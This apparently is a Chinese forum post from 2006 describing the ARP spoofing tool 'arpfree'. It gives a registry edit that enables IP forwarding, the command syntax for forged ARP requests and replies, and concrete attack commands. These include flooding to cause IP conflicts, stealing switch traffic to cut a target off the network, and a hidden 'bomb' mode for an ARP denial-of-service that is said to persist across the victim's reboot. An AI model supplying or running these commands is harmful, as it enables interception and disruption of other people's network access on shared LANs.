開始忘記說了,要使用ARP欺騙,必須啟動ip路由功能,修改(添加)注冊表選項:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友發現打開網卡失敗,原因可能就是這個.
發送的時候可以選擇ARP的TYPE。如果是ARP請求報文,則只要輸入要問的IP地址
如果是ARP應答報文則要輸入發送端的IP以及對方詢問MAC地址對應的IP地址
最後的發送速度可選參數為:(大小寫敏感..我覺得挺不好的)
fast----------最快
hear---------每60MS一個包(可能是比較適合結合SNIFFER做監聽)
slowhear---每500MS一個包
auto---------每1秒一個包
slow---------每2秒個包
使用方法如下:
***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************
補充:反擊“LAN終結者”的辦法:
反擊“終結者”有幾個辦法:
1:發動比他更強烈的攻擊:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
這裡是你想攻擊的人的IP地址
2:交換機競爭:
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
這裡是你想攻擊的人的MAC地址
1:情況將導致他IP地址沖突(比“終結者”來的猛烈多了)
2:情況將使得他無法連接網絡(由於交換機把他的流量都給你了)
———————————更-----新----消-----息—————————————————————
因為有朋友反映在非交換環境下,如使用HUB的情況下,無法對目標進行打擊
故於2006年4月5日更新附件“arpfree.rar”
增加參數“bomb”,使用方法如下:
假設,目標為IP:192.168.237.109 目標mac為:011a8575a436
攻擊命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其實就是進行簡單的ARP DOS攻擊,快速刷新目標的ARP緩存,可以在消耗自身較少系統資源的情況下
造成和PDOS工具類似的效果,並且如果你不停止攻擊,對方重啟以後也無法正常進入系統
(當然前提是他沒拔網線)。
其實這樣做是十分不厚道的....所以參數就沒有寫在程序的 HELP 裡面,大家慎用...